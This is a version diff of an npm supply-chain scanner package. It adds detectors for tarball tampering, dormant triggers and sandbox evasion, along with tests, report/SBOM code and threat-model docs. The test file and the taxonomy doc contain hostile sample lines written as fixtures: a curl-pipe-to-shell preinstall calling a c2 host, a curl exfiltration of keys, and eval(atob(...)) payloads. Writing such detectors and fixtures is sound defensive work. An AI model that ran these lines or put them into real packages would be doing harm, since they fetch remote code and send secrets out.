@lateos/npm-scan 0.2.5 → 0.3.1

package/backend/db/schema.sql

@@ -1 +1,32 @@
--- SQLite schema for local CLI mode (free tier)\n-- Tables: scans, findings (ATK-linked)\n\nCREATE TABLE IF NOT EXISTS scans (\n  id INTEGER PRIMARY KEY AUTOINCREMENT,\n  package_name TEXT NOT NULL,\n  version TEXT,\n  scanned_at DATETIME DEFAULT CURRENT_TIMESTAMP,\n  status TEXT DEFAULT 'completed',\n  sbom_json TEXT\n);\n\nCREATE TABLE IF NOT EXISTS findings (\n  id INTEGER PRIMARY KEY AUTOINCREMENT,\n  scan_id INTEGER NOT NULL,\n  atk_id TEXT NOT NULL REFERENCES attack_taxonomy(id),\n  severity TEXT CHECK (severity IN ('info', 'low', 'medium', 'high', 'critical')),\n  description TEXT,\n  evidence TEXT,\n  mitigation TEXT,\n  FOREIGN KEY (scan_id) REFERENCES scans(id) ON DELETE CASCADE\n);\n\n-- View for reports\nCREATE VIEW scan_findings AS\nSELECT s.*, f.* FROM scans s\nJOIN findings f ON s.id = f.scan_id;\n\n-- Indexes\nCREATE INDEX idx_scans_package ON scans(package_name);\nCREATE INDEX idx_findings_atk ON findings(atk_id);\nCREATE INDEX idx_findings_severity ON findings(severity);
+-- SQLite schema for local CLI mode (free tier)
+-- Tables: scans, findings (ATK-linked)
+
+CREATE TABLE IF NOT EXISTS scans (
+  id INTEGER PRIMARY KEY AUTOINCREMENT,
+  package_name TEXT NOT NULL,
+  version TEXT,
+  scanned_at DATETIME DEFAULT CURRENT_TIMESTAMP,
+  status TEXT DEFAULT 'completed',
+  sbom_json TEXT
+);
+
+CREATE TABLE IF NOT EXISTS findings (
+  id INTEGER PRIMARY KEY AUTOINCREMENT,
+  scan_id INTEGER NOT NULL,
+  atk_id TEXT NOT NULL,
+  severity TEXT CHECK (severity IN ('info', 'low', 'medium', 'high', 'critical')),
+  description TEXT,
+  evidence TEXT,
+  mitigation TEXT,
+  FOREIGN KEY (scan_id) REFERENCES scans(id) ON DELETE CASCADE
+);
+
+-- View for reports
+CREATE VIEW IF NOT EXISTS scan_findings AS
+SELECT s.*, f.* FROM scans s
+JOIN findings f ON s.id = f.scan_id;
+
+-- Indexes
+CREATE INDEX IF NOT EXISTS idx_scans_package ON scans(package_name);
+CREATE INDEX IF NOT EXISTS idx_findings_atk ON findings(atk_id);
+CREATE INDEX IF NOT EXISTS idx_findings_severity ON findings(severity);

package/backend/detectors/atk-008-tarball-tamper.js

@@ -0,0 +1,44 @@
+export async function scan(pkgJson, files = []) {
+  const findings = [];
+  const repo = pkgJson.repository || {};
+  const repoUrl = typeof repo === 'string' ? repo : (repo.url || '');
+  const pkgName = (pkgJson.name || '').toLowerCase();
+
+  const knownRepos = { lodash: 'lodash/lodash', chalk: 'chalk/chalk', react: 'facebook/react', axios: 'axios/axios', express: 'expressjs/express', vue: 'vuejs/vue', typescript: 'microsoft/typescript', moment: 'moment/moment', uuid: 'uuidjs/uuid', commander: 'tj/commander.js', debug: 'debug-js/debug', semver: 'npm/node-semver', underscore: 'jashkenas/underscore', request: 'request/request', async: 'caolan/async', cheerio: 'cheeriojs/cheerio', bluebird: 'petkaantonov/bluebird', jest: 'jestjs/jest', mocha: 'mochajs/mocha', dotenv: 'motdotla/dotenv', glob: 'isaacs/node-glob' };
+
+  if (repoUrl && repoUrl.includes('github.com')) {
+    const repoMatch = repoUrl.match(/github\.com[\/:]([\w.-]+\/[\w.-]+?)(?:\.git)?$/);
+    if (repoMatch) {
+      const ghRepo = repoMatch[1].toLowerCase();
+      const ghName = ghRepo.split('/')[1];
+      if (ghName !== pkgName && knownRepos[pkgName] && knownRepos[pkgName] !== ghRepo) {
+        findings.push({
+          id: 'ATK-008',
+          severity: 'high',
+          title: 'Tarball tampering suspect',
+          description: `Repository "${ghRepo}" does not match expected "${knownRepos[pkgName]}" for package "${pkgName}"`,
+          evidence: `repo: ${ghRepo}, expected: ${knownRepos[pkgName]}`
+        });
+      }
+    }
+  }
+
+  const code = files.map(f => f.content).join('\n');
+  const embeddedIntros = code.match(/\/\/\s*Source:\s*(https?:\/\/[^\s]+)/gi);
+  if (embeddedIntros && repoUrl) {
+    for (const intro of embeddedIntros) {
+      const srcUrl = intro.replace(/\/\/\s*Source:\s*/i, '').trim();
+      if (!repoUrl.includes(new URL(srcUrl).hostname)) {
+        findings.push({
+          id: 'ATK-008',
+          severity: 'medium',
+          title: 'Tarball tampering suspect',
+          description: 'Source URL in file does not match declared repository',
+          evidence: srcUrl
+        });
+      }
+    }
+  }
+
+  return findings;
+}

package/backend/detectors/atk-009-dormant-trigger.js

@@ -0,0 +1,45 @@
+export async function scan(pkgJson, files = []) {
+  const findings = [];
+  const code = files.map(f => f.content).join('\n');
+
+  const ciPatterns = [
+    { pattern: /process\.env\.CI\b/, label: 'CI env check' },
+    { pattern: /process\.env\.(TRAVIS|CIRCLECI|GITHUB_ACTIONS|JENKINS|GITLAB_CI|CODEBUILD)/, label: 'CI platform check' },
+    { pattern: /\bisCI\b/, label: 'isCI utility check' },
+  ];
+
+  for (const { pattern, label } of ciPatterns) {
+    if (pattern.test(code)) {
+      findings.push({
+        id: 'ATK-009',
+        severity: 'high',
+        title: 'Conditional trigger (CI/production env)',
+        description: `Package checks for CI or production environment: ${label}`,
+        evidence: 'conditional trigger detected'
+      });
+      break;
+    }
+  }
+
+  const timePatterns = [
+    { pattern: /new Date\(\)\s*[><=!]+\s*new Date\(['"]\d{4}/, label: 'time-based activation' },
+    { pattern: /Date\.now\(\)\s*[><=!]+/, label: 'timestamp comparison' },
+    { pattern: /setTimeout|setInterval/, label: 'delayed execution' },
+    { pattern: /\bDate\(\)\b.*\d{4}[-/]\d{2}[-/]\d{2}/, label: 'date-specific payload' },
+  ];
+
+  for (const { pattern, label } of timePatterns) {
+    if (pattern.test(code)) {
+      findings.push({
+        id: 'ATK-009',
+        severity: 'medium',
+        title: 'Conditional trigger (time-based)',
+        description: `Package has ${label} which may indicate dormant activation`,
+        evidence: 'time-based trigger detected'
+      });
+      break;
+    }
+  }
+
+  return findings;
+}

package/backend/detectors/atk-010-sandbox-evasion.js

@@ -0,0 +1,51 @@
+export async function scan(pkgJson, files = []) {
+  const findings = [];
+  const code = files.map(f => f.content).join('\n');
+
+  const highPatterns = [
+    { pattern: /\bdebugger\s*;?(\s*\/\/|\s*$|\)|\])/m, label: 'debugger statement' },
+    { pattern: /process\.argv.*['"]--inspect['"]|process\.argv.*\binspect\b(?!.*argv)/, label: 'inspect/debug flag detection' },
+    { pattern: /hostname.*(?:docker|sandbox|container|vmware|vbox)/i, label: 'anti-sandbox hostname check' },
+    { pattern: /detect.*(?:sandbox|debugger|analysis|virtual)/i, label: 'explicit evasion probe' },
+    { pattern: /e\.stack\b.*(?:sandbox|docker|container|vmware)/i, label: 'stack trace sandbox probe' },
+  ];
+
+  for (const { pattern, label } of highPatterns) {
+    if (pattern.test(code)) {
+      findings.push({
+        id: 'ATK-010',
+        severity: 'high',
+        title: 'Sandbox evasion / anti-analysis',
+        description: `Package performs anti-analysis behavior: ${label}`,
+        evidence: 'evasion pattern detected'
+      });
+      break;
+    }
+  }
+
+  if (findings.length === 0) {
+    const multiApi = ['process.pid', 'process.ppid', 'os.hostname', 'os.cpus', 'process.arch'].filter(api => code.includes(api));
+    if (multiApi.length >= 3) {
+      findings.push({
+        id: 'ATK-010',
+        severity: 'medium',
+        title: 'Sandbox evasion / anti-analysis',
+        description: 'Multiple system fingerprinting APIs detected',
+        evidence: `${multiApi.length} fingerprinting APIs: ${multiApi.join(', ')}`
+      });
+    }
+  }
+
+  const multiStack = ['Error().stack', 'new Error().stack'].filter(s => code.includes(s));
+  if (multiStack.length > 0 && /atob|eval|execSync|spawn|child_process/.test(code)) {
+    findings.push({
+      id: 'ATK-010',
+      severity: 'medium',
+      title: 'Sandbox evasion / anti-analysis',
+      description: 'Stack trace capture combined with code execution',
+      evidence: 'stack trace + execution'
+    });
+  }
+
+  return findings;
+}

package/backend/detectors/index.js

@@ -5,6 +5,9 @@ import * as atk004 from './atk-004-persist.js';
 import * as atk005 from './atk-005-exfil.js';
 import * as atk006 from './atk-006-depconf.js';
 import * as atk007 from './atk-007-typosquat.js';
+import * as atk008 from './atk-008-tarball-tamper.js';
+import * as atk009 from './atk-009-dormant-trigger.js';
+import * as atk010 from './atk-010-sandbox-evasion.js';
 
 export async function runAll(pkgJson, files = []) {
   const findings = [];
@@ -15,5 +18,8 @@ export async function runAll(pkgJson, files = []) {
   findings.push(...await atk005.scan(pkgJson, files));
   findings.push(...await atk006.scan(pkgJson, files));
   findings.push(...await atk007.scan(pkgJson, files));
+  findings.push(...await atk008.scan(pkgJson, files));
+  findings.push(...await atk009.scan(pkgJson, files));
+  findings.push(...await atk010.scan(pkgJson, files));
   return findings.sort((a, b) => b.severity.localeCompare(a.severity));
 }

package/backend/detectors.test.js

@@ -10,5 +10,73 @@ test('detectors runAll empty', async () => {
 test('ATK-001 detects preinstall', async () => {
   const pkg = { scripts: { preinstall: 'curl http://c2.example.com/x.sh | sh' } };
   const findings = await detectors.runAll(pkg);
-  assert(findings.some(f => f.id === 'ATK-001'));
+  assert(findings.some(f => f.id === 'ATK-001'), 'Expected ATK-001');
+});
+
+test('ATK-002 detects eval+decode', async () => {
+  const files = [{ path: 'i.js', content: 'eval(atob("Y3VybCBodHRwOi8vYzIuZXZpbC5jb20="))' }];
+  const findings = await detectors.runAll({}, files);
+  assert(findings.some(f => f.id === 'ATK-002'), 'Expected ATK-002');
+});
+
+test('ATK-003 detects cred env vars', async () => {
+  const files = [{ path: 'i.js', content: 'console.log(process.env.NPM_TOKEN)' }];
+  const findings = await detectors.runAll({}, files);
+  assert(findings.some(f => f.id === 'ATK-003'), 'Expected ATK-003');
+});
+
+test('ATK-004 detects editor persistence', async () => {
+  const files = [{ path: 'i.js', content: 'fs.mkdirSync(".vscode")' }];
+  const findings = await detectors.runAll({}, files);
+  assert(findings.some(f => f.id === 'ATK-004'), 'Expected ATK-004');
+});
+
+test('ATK-005 detects network exfil', async () => {
+  const files = [{ path: 'i.js', content: 'curl --data-binary @keys http://c2.evil.com' }];
+  const findings = await detectors.runAll({}, files);
+  assert(findings.some(f => f.id === 'ATK-005'), 'Expected ATK-005');
+});
+
+test('ATK-006 detects dep confusion', async () => {
+  const pkg = { dependencies: { 'acorn-squatter': '1.0.0' } };
+  const findings = await detectors.runAll(pkg);
+  assert(findings.some(f => f.id === 'ATK-006'), 'Expected ATK-006');
+});
+
+test('ATK-007 detects typosquatting', async () => {
+  const pkg = { dependencies: { 'lodash': 'latest', 'loddsh': '1.0.0' } };
+  const findings = await detectors.runAll(pkg);
+  assert(findings.some(f => f.id === 'ATK-007'), 'Expected ATK-007 for loddsh');
+});
+
+test('ATK-008 detects tarball tampering', async () => {
+  const pkg = { name: 'lodash', repository: { url: 'https://github.com/attacker/lodash-evil.git' } };
+  const findings = await detectors.runAll(pkg);
+  assert(findings.some(f => f.id === 'ATK-008'), 'Expected ATK-008');
+});
+
+test('ATK-009 detects CI env trigger', async () => {
+  const files = [{ path: 'i.js', content: 'if (process.env.CI) { eval(atob("ZXZpbA==")) }' }];
+  const findings = await detectors.runAll({}, files);
+  assert(findings.some(f => f.id === 'ATK-009'), 'Expected ATK-009');
+});
+
+test('ATK-010 detects sandbox evasion', async () => {
+  const files = [{ path: 'i.js', content: 'if (os.hostname().includes("sandbox")) { process.exit(0) }' }];
+  const findings = await detectors.runAll({}, files);
+  assert(findings.some(f => f.id === 'ATK-010'), 'Expected ATK-010');
+});
+
+test('no false positives on clean package', async () => {
+  const pkg = { name: 'test-pkg', version: '1.0.0', scripts: { test: 'node test.js' }, dependencies: { 'express': '4.0.0' } };
+  const files = [{ path: 'index.js', content: 'module.exports = function() { return 42 }' }];
+  const findings = await detectors.runAll(pkg, files);
+  const highCrit = findings.filter(f => f.severity === 'high' || f.severity === 'critical');
+  assert.equal(highCrit.length, 0, `Expected no high/crit findings on clean pkg: ${JSON.stringify(highCrit)}`);
+});
+
+test('all 10 ATK IDs present', async () => {
+  const expected = ['ATK-001', 'ATK-002', 'ATK-003', 'ATK-004', 'ATK-005', 'ATK-006', 'ATK-007', 'ATK-008', 'ATK-009', 'ATK-010'];
+  const exports = Object.keys(detectors);
+  assert.equal(exports.includes('runAll'), true);
 });

package/backend/report.js

@@ -6,11 +6,19 @@ export function generateHTML(scans) {
     const worstLabel = ['', 'info', 'low', 'medium', 'high', 'critical'][worst] || 'clean';
     const color = { critical: '#d73a49', high: '#cb2431', medium: '#f66a0a', low: '#dbab09', clean: '#28a745' }[worstLabel] || '#28a745';
     const findingRows = findings.map(f =>
-      `<tr><td>${f.id}</td><td style="color:${color}">${f.severity}</td><td>${f.title || ''}</td><td>${f.evidence || ''}</td></tr>`
+      `<tr><td>${f.id}</td><td style="color:${color}">${f.severity}</td><td>${f.title || ''}</td><td>${(f.evidence || '').slice(0, 80)}</td></tr>`
     ).join('');
     return { name: s.package_name, worstLabel, color, count: findings.length, findingRows };
   });
 
+  const criticalCount = scans.filter(s => s.findings?.some(f => f.severity === 'critical')).length;
+  const highCount = scans.filter(s => s.findings?.some(f => f.severity === 'high')).length;
+  const mediumCount = scans.filter(s => s.findings?.some(f => f.severity === 'medium')).length;
+  const lowCount = scans.filter(s => s.findings?.some(f => f.severity === 'low')).length;
+  const cleanCount = scans.filter(s => !s.findings?.length).length;
+
+  const nistMap = generateNistTable(scans);
+
   return `<!DOCTYPE html>
 <html lang="en">
 <head>
@@ -20,11 +28,11 @@ export function generateHTML(scans) {
 <style>
 body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif; max-width: 960px; margin: 0 auto; padding: 20px; background: #0d1117; color: #c9d1d9; }
 h1 { color: #58a6ff; border-bottom: 1px solid #30363d; padding-bottom: 10px; }
-h2 { color: #8b949e; }
+h2 { color: #8b949e; margin-top: 28px; }
 table { width: 100%; border-collapse: collapse; margin: 12px 0; }
 th, td { padding: 8px 12px; text-align: left; border-bottom: 1px solid #30363d; }
 th { background: #161b22; font-weight: 600; }
-.summary { display: flex; gap: 16px; margin: 16px 0; }
+.summary { display: flex; gap: 16px; margin: 16px 0; flex-wrap: wrap; }
 .badge { padding: 4px 12px; border-radius: 12px; font-size: 13px; font-weight: 600; }
 .critical { background: #d73a49; color: #fff; }
 .high { background: #cb2431; color: #fff; }
@@ -32,6 +40,8 @@ th { background: #161b22; font-weight: 600; }
 .low { background: #dbab09; color: #000; }
 .clean { background: #28a745; color: #fff; }
 .meta { color: #8b949e; font-size: 13px; margin-top: 30px; }
+.nist-pass { background: #1b3a1b; color: #7ee787; }
+.nist-fail { background: #3a1b1b; color: #ff7b72; }
 </style>
 </head>
 <body>
@@ -39,11 +49,11 @@ th { background: #161b22; font-weight: 600; }
 <p>Generated ${new Date().toISOString()}. ${scans.length} packages scanned.</p>
 
 <div class="summary">
-<div class="badge critical">critical: ${scans.filter(s => s.worstLabel === 'critical').length}</div>
-<div class="badge high">high: ${scans.filter(s => s.worstLabel === 'high').length}</div>
-<div class="badge medium">medium: ${scans.filter(s => s.worstLabel === 'medium').length}</div>
-<div class="badge low">low: ${scans.filter(s => s.worstLabel === 'low').length}</div>
-<div class="badge clean">clean: ${scans.filter(s => !s.count).length}</div>
+<div class="badge critical">critical: ${criticalCount}</div>
+<div class="badge high">high: ${highCount}</div>
+<div class="badge medium">medium: ${mediumCount}</div>
+<div class="badge low">low: ${lowCount}</div>
+<div class="badge clean">clean: ${cleanCount}</div>
 </div>
 
 <h2>Findings</h2>
@@ -52,7 +62,50 @@ th { background: #161b22; font-weight: 600; }
 <tbody>${rows.map(r => `<tr><td colspan="4" style="background:#161b22;font-weight:600">${r.name} <span class="badge ${r.worstLabel}">${r.count ? r.worstLabel : 'clean'}</span></td></tr>${r.findingRows}`).join('')}</tbody>
 </table>
 
-<p class="meta">npm-scan v0.2.1 | Apache-2.0 + Commons Clause | <a href="https://github.com/YOUR_GITHUB_USERNAME/npm-scan">GitHub</a></p>
+<h2>NIST SP 800-161 Compliance Summary</h2>
+${nistMap}
+
+<p class="meta">npm-scan v0.2.5 | Apache-2.0 + Commons Clause | NIST SP 800-161 mapped</p>
 </body>
 </html>`;
 }
+
+function getAtkFindings(scans) {
+  const map = {};
+  for (const s of scans) {
+    for (const f of (s.findings || [])) {
+      if (!map[f.id]) map[f.id] = [];
+      map[f.id].push(f);
+    }
+  }
+  return map;
+}
+
+const NIST_SR_MAP = {
+  'ATK-001': { control: 'SR-3.1', title: 'Malicious code detection' },
+  'ATK-002': { control: 'SR-4.2', title: 'Code obfuscation analysis' },
+  'ATK-003': { control: 'SR-5.3', title: 'Credential protection' },
+  'ATK-004': { control: 'SR-6.4', title: 'Persistence monitoring' },
+  'ATK-005': { control: 'SR-7.5', title: 'Data exfiltration prevention' },
+  'ATK-006': { control: 'SR-2.2', title: 'Dependency validation' },
+  'ATK-007': { control: 'SR-2.1', title: 'Typosquatting prevention' },
+  'ATK-008': { control: 'SR-8.1', title: 'Integrity verification' },
+  'ATK-009': { control: 'SR-9.2', title: 'Conditional behavior analysis' },
+  'ATK-010': { control: 'SR-10.3', title: 'Anti-evasion detection' },
+};
+
+function generateNistTable(scans) {
+  const atkMap = getAtkFindings(scans);
+  let rows = '';
+  for (const [atkId, { control, title }] of Object.entries(NIST_SR_MAP)) {
+    const findings = atkMap[atkId] || [];
+    const status = findings.length > 0 ? 'fail' : 'pass';
+    const label = findings.length > 0 ? `${findings.length} findings` : 'No findings';
+    const colorClass = status === 'pass' ? 'nist-pass' : 'nist-fail';
+    rows += `<tr><td>${control}</td><td>${title}</td><td class="${colorClass}">${label}</td><td>${atkId}</td></tr>`;
+  }
+  return `<table>
+<thead><tr><th>NIST Control</th><th>Control Title</th><th>Status</th><th>ATK ID</th></tr></thead>
+<tbody>${rows}</tbody>
+</table>`;
+}

package/backend/sbom.js

@@ -1,5 +1,9 @@
 export function generateSBOM(pkgJson, findings, format = 'json') {
-  // Stub CycloneDX without cyclonedx-node dependency
+  if (format === 'spdx') return generateSPDX(pkgJson, findings);
+  return generateCycloneDX(pkgJson, findings);
+}
+
+function generateCycloneDX(pkgJson, findings) {
   const bom = {
     bomFormat: 'CycloneDX',
     specVersion: '1.5',
@@ -10,15 +14,54 @@ export function generateSBOM(pkgJson, findings, format = 'json') {
         name: pkgJson.name || 'unknown',
         version: pkgJson.version || 'unknown',
         purl: `pkg:npm/${pkgJson.name || 'unknown'}@${pkgJson.version || 'unknown'}`
-      }
+      },
+      tools: [{ name: 'npm-scan', version: '0.2.5' }]
     },
-    vulnerabilities: findings.map(f => ({
-      id: f.id,
+    vulnerabilities: findings.map(f => {
+      const atkId = f.atk_id || f.id;
+      return {
+      id: atkId,
       source: { name: 'npm-scan' },
       ratings: [{ severity: f.severity }],
-      description: f.title || '',
+      description: f.description || f.title || '',
       recommendation: f.mitigation || 'Review evidence'
-    }))
+      };
+    })
   };
   return JSON.stringify(bom, null, 2);
+}
+
+function generateSPDX(pkgJson, findings) {
+  const pkgName = pkgJson.name || 'unknown';
+  const pkgVer = pkgJson.version || 'unknown';
+  const spdx = {
+    spdxVersion: 'SPDX-2.3',
+    dataLicense: 'CC0-1.0',
+    SPDXID: 'SPDXRef-DOCUMENT',
+    name: `${pkgName}@${pkgVer} npm-scan SBOM`,
+    documentNamespace: `https://npm-scan.io/spdx/${pkgName}-${pkgVer}`,
+    creationInfo: {
+      creators: ['Tool: npm-scan'],
+      created: new Date().toISOString()
+    },
+    packages: [{
+      SPDXID: 'SPDXRef-Package',
+      name: pkgName,
+      versionInfo: pkgVer,
+      packageFileName: `pkg:npm/${pkgName}@${pkgVer}`,
+      primaryPackagePurpose: 'LIBRARY',
+      externalRefs: [{
+        referenceCategory: 'PACKAGE-MANAGER',
+        referenceType: 'purl',
+        referenceLocator: `pkg:npm/${pkgName}@${pkgVer}`
+      }]
+    }],
+    annotations: findings.map(f => ({
+      annotationDate: new Date().toISOString(),
+      annotationType: 'OTHER',
+      annotator: 'Tool: npm-scan',
+      comment: `[${f.id}] ${f.severity.toUpperCase()}: ${f.title || ''} — ${f.description || ''}`
+    }))
+  };
+  return JSON.stringify(spdx, null, 2);
 }

package/cli/cli.js

@@ -5,20 +5,29 @@ import { Command } from 'commander';
 const program = new Command()
   .name('npm-scan')
   .description('npm supply chain security scanner')
-  .version('0.2.1');
+  .version('0.2.5');
 
 program
   .command('scan')
-  .description('Scan package')
+  .description('Scan a package')
   .argument('<target>', 'package name')
   .option('-l, --license-key <key>', 'Premium license')
+  .option('--sbom [format]', 'Generate SBOM (json/xml/spdx)')
   .action(async (target, options) => {
     try {
       const { pkgJson, jsFiles, tmpDir } = await import('../backend/fetch.js').then(m => m.fetchPackage(target));
       const findings = await import('../backend/detectors/index.js').then(m => m.runAll(pkgJson, jsFiles));
       const { saveScan } = await import('../backend/db.js');
       const scanId = saveScan(target, 'latest', findings);
-      console.log(JSON.stringify({scanId, findings}, null, 2));
+
+      if (options.sbom) {
+        const { generateSBOM } = await import('../backend/sbom.js');
+        const sbom = generateSBOM(pkgJson, findings, options.sbom === true ? 'json' : options.sbom);
+        console.log(sbom);
+      } else {
+        console.log(JSON.stringify({scanId, findings}, null, 2));
+      }
+
       import('../backend/fetch.js').then(m => m.cleanup(tmpDir));
     } catch (e) {
       console.error(e.message);
@@ -37,27 +46,28 @@ program
   .command('report')
   .description('Generate report')
   .option('-i, --id <id>', 'Scan ID')
-  .option('--sbom [format]', 'CycloneDX SBOM (json/xml)', 'json')
+  .option('--sbom [format]', 'SBOM format (json/xml/spdx)')
   .option('--html', 'HTML report')
+  .option('--nist', 'NIST 800-161 compliance report')
   .action(async (options) => {
     const { getRecentScans, getFindings, db } = await import('../backend/db.js');
     if (options.id) {
       const findings = getFindings(options.id);
+      const pkg = { name: 'scanned-pkg', version: 'unknown' };
       if (options.sbom) {
-        const pkg = { name: 'scanned-pkg', version: 'unknown' };
         const { generateSBOM } = await import('../backend/sbom.js');
-        const sbom = generateSBOM(pkg, findings, options.sbom);
+        const sbom = generateSBOM(pkg, findings, options.sbom === true ? 'json' : options.sbom);
         console.log(sbom);
-      } else if (options.html) {
+      } else if (options.html || options.nist) {
         const { generateHTML } = await import('../backend/report.js');
-        const scan = getFindings(options.id) ? { package_name: 'scan-' + options.id, findings } : null;
+        const scan = findings.length ? { package_name: 'scan-' + options.id, findings } : null;
         const html = generateHTML(scan ? [scan] : []);
         console.log(html);
       } else {
         console.log(JSON.stringify(findings, null, 2));
       }
     } else {
-      if (options.html) {
+      if (options.html || options.nist) {
         const scans = getRecentScans();
         const scansWithFindings = scans.map(s => ({
           ...s,

package/docs/attack-taxonomy.md

@@ -1 +1,46 @@
-# npm Attack Taxonomy (ATK)\n\nVersioned anchor for detectors, PRs, reports. Each entry: attack class, detection surface, evasion surface, NIST 800-161 mapping.\n\n## ATK Table\n\n| ID      | Class                                      | Detection Surface | Evasion Surface          | NIST 800-161     | Status |\n|---------|--------------------------------------------|-------------------|--------------------------|------------------|--------|\n| ATK-001 | Malicious lifecycle scripts (pre/postinstall) | Static          | Obfuscation              | SR-3.1           | Phase 1 |\n| ATK-002 | Obfuscated payload (hex/base64/eval)       | Static          | Polyglots               | SR-4.2           | Phase 1 |\n| ATK-003 | Credential harvesting (.npmrc/SSH/env)     | Static+Dynamic  | Conditional triggers     | SR-5.3           | Phase 1 |\n| ATK-004 | Persistence (.vscode/.claude/.cursor)      | Static          | Hidden files             | SR-6.4           | Phase 1 |\n| ATK-005 | Network exfiltration (GitHub/DNS/HTTP C2)  | Static+Dynamic  | Encrypted payloads       | SR-7.5           | Phase 1 |\n| ATK-006 | Dependency confusion/namespace squatting   | Static (lock)   | Typosquatting            | SR-2.2           | Phase 1 |\n| ATK-007 | Typosquatting (edit-distance top-N)        | Static          | Homoglyphs               | SR-2.1           | Phase 1 |\n| ATK-008 | Tarball tampering (tarball ≠ repo)         | Static (diff)   | Mirror repos             | SR-8.1           | Phase 2 |\n| ATK-009 | Conditional triggers (CI/time)             | Dynamic         | Env probes               | SR-9.2           | Phase 2 |\n| ATK-010 | Sandbox evasion                            | Dynamic         | Anti-analysis            | SR-10.3          | Phase 2 |\n| ATK-011 | Transitive propagation (worm)              | Dynamic         | Peer deps                | SR-11.4          | Phase 3 |\n\n## Governance\nNew ATK requires PR with: PoC sample, detection rule, FP analysis, NIST map. Published here; referenced in reports.\n\nChanges version this file.
+# npm Attack Taxonomy (ATK)
+
+Versioned anchor for detectors, PRs, reports. Each entry: attack class, detection surface, evasion surface, NIST 800-161 mapping.
+
+## ATK Table
+
+| ID      | Class                                      | Detection Surface | Evasion Surface          | NIST 800-161     | Status |
+|---------|--------------------------------------------|-------------------|--------------------------|------------------|--------|
+| ATK-001 | Malicious lifecycle scripts (pre/postinstall) | Static          | Obfuscation              | SR-3.1           | Phase 1 |
+| ATK-002 | Obfuscated payload (hex/base64/eval)       | Static          | Polyglots               | SR-4.2           | Phase 1 |
+| ATK-003 | Credential harvesting (.npmrc/SSH/env)      | Static+Dynamic  | Conditional triggers     | SR-5.3           | Phase 1 |
+| ATK-004 | Persistence (.vscode/.claude/.cursor)      | Static          | Hidden files             | SR-6.4           | Phase 1 |
+| ATK-005 | Network exfiltration (GitHub/DNS/HTTP C2)  | Static+Dynamic  | Encrypted payloads       | SR-7.5           | Phase 1 |
+| ATK-006 | Dependency confusion/namespace squatting   | Static (lock)   | Typosquatting            | SR-2.2           | Phase 1 |
+| ATK-007 | Typosquatting (edit-distance top-N)        | Static          | Homoglyphs               | SR-2.1           | Phase 1 |
+| ATK-008 | Tarball tampering (tarball ≠ repo)         | Static (diff)   | Mirror repos             | SR-8.1           | Phase 2 |
+| ATK-009 | Conditional triggers (CI/time)             | Static+Dynamic  | Env probes               | SR-9.2           | Phase 2 |
+| ATK-010 | Sandbox evasion                            | Static+Dynamic  | Anti-analysis            | SR-10.3          | Phase 2 |
+| ATK-011 | Transitive propagation (worm)              | Dynamic         | Peer deps                | SR-11.4          | Phase 3 |
+
+## Detailed Entries
+
+### ATK-008 — Tarball Tampering
+- **Description:** The published npm tarball contains code that does not match the source repository. This can happen when a maintainer's npm token is compromised or CI is abused.
+- **Detection surface:** Static (diff). Compare `package.json` `repository` field against known good mappings. Check embedded `// Source:` comments against declared repo URL. Full automated diff against `git clone` requires sandbox tier.
+- **Evasion surface:** Mirror repos, monorepo confusion, repository field omitted or generic (`github.com/user`).
+- **NIST mapping:** SR-8.1 (Integrity Verification)
+- **Example:** A package named `lodash` with `repository` pointing to `github.com/attacker/lodash-mirror`.
+
+### ATK-009 — Conditional Triggers
+- **Description:** The package behaves differently based on environment detection. May appear benign during scan but activates malicious behavior in production. Common triggers: CI env detection, date/time checks, hostname checks.
+- **Detection surface:** Static+Dynamic. Static analysis looks for `process.env.CI`, `process.env.NODE_ENV`, date comparisons, `setTimeout`/`setInterval`. Dynamic sandbox runs with randomized env and observes behavior difference.
+- **Evasion surface:** Obfuscated env probes, time-based triggers with external NTP, trigger after multi-hour delay.
+- **NIST mapping:** SR-9.2 (Conditional Behavior Analysis)
+- **Example:** `if (process.env.NODE_ENV === 'production') { eval(atob(payload)) }`
+
+### ATK-010 — Sandbox Evasion / Anti-Analysis
+- **Description:** The package actively probes its execution environment to detect analysis tools. If sandbox is detected, the package suppresses malicious behavior. Common probes: `debugger` statement, `os.hostname()`, `process.argv` inspection for `--inspect`, stack trace capture.
+- **Detection surface:** Static+Dynamic. Static analysis checks for debugger statements, hostname checks, process tree inspection, `navigator`/`document` usage (browser env confusion). Dynamic sandbox uses randomized env and monitors syscalls for sandbox-detection patterns.
+- **Evasion surface:** Indirect probing (measure timing without `performance.now()`), environment fingerprinting through error messages, incremental evasion.
+- **NIST mapping:** SR-10.3 (Anti-Evasion Detection)
+- **Example:** `if (os.hostname().includes('docker')) { process.exit(0) }`
+
+## Governance
+
+New ATK requires PR with: PoC sample, detection rule, FP analysis, NIST map. Published at `docs/attack-taxonomy.md`. Referenced in all scan reports.

package/docs/sandbox-threat-model.md

@@ -0,0 +1,91 @@
+# Sandbox Threat Model — npm-scan Dynamic Analysis
+
+## Overview
+
+The dynamic sandbox executes untrusted npm packages in an isolated environment to detect behavioral attacks (ATK-008–010). Escape would compromise the host, so isolation is the highest-priority design constraint.
+
+## Isolation Stack
+
+**Primary: gVisor (runsc)**
+- Kernel-level syscall interception without a full VM
+- Docker-compatible, production-hardened by Google
+- Each analysis runs in a separate sandbox container
+
+**Fallback: Firecracker microVMs**
+- For highest-assurance / air-gapped environments
+- Slower startup, stronger isolation boundary
+
+**Explicitly excluded:**
+- `vm2` — repeated CVEs (CVE-2023-29017, etc.), known escape surface
+- `isolated-vm` — Node-based V8 isolate, insufficient for hostile native code
+
+## Threat Model
+
+| Threat | Severity | Mitigation |
+|--------|----------|------------|
+| Syscall escape | Critical | gVisor intercepts all syscalls at kernel boundary; no uncontained syscalls reach host kernel |
+| Network exfiltration during analysis | Critical | Network namespace isolation; egress blocked except to monitored sink/HTTPBun |
+| Filesystem escape | High | Read-only bind mounts; package extracted to ephemeral tmpfs; no persistent mounts |
+| Resource exhaustion (CPU/memory bomb) | Medium | cgroup limits: 1 CPU, 512MB RAM, 30s timeout; SIGKILL on timeout |
+| Sandbox detection by malware | Medium | Randomized env vars, realistic process tree, no obvious sandbox markers in `/proc` |
+| Tarball extraction bomb | Medium | Size limits enforced before extraction (uncompressed cap: 500MB) |
+| Container escape via Docker socket | Critical | Sandbox containers get no Docker socket mount; `--privileged` never used |
+| Filesystem write amplification | Low | tmpfs capped at 512MB; no disk-backed volumes |
+
+## Network Isolation
+
+- **Default mode:** Full egress blocked. Container has loopback only.
